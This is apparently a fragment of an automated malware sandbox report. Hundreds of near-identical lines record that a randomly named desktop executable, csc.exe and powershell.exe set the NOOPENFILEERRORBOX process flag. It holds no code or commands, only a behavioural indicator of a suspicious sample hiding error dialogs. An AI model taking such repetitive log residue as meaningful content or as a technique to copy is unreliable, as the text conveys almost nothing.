                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
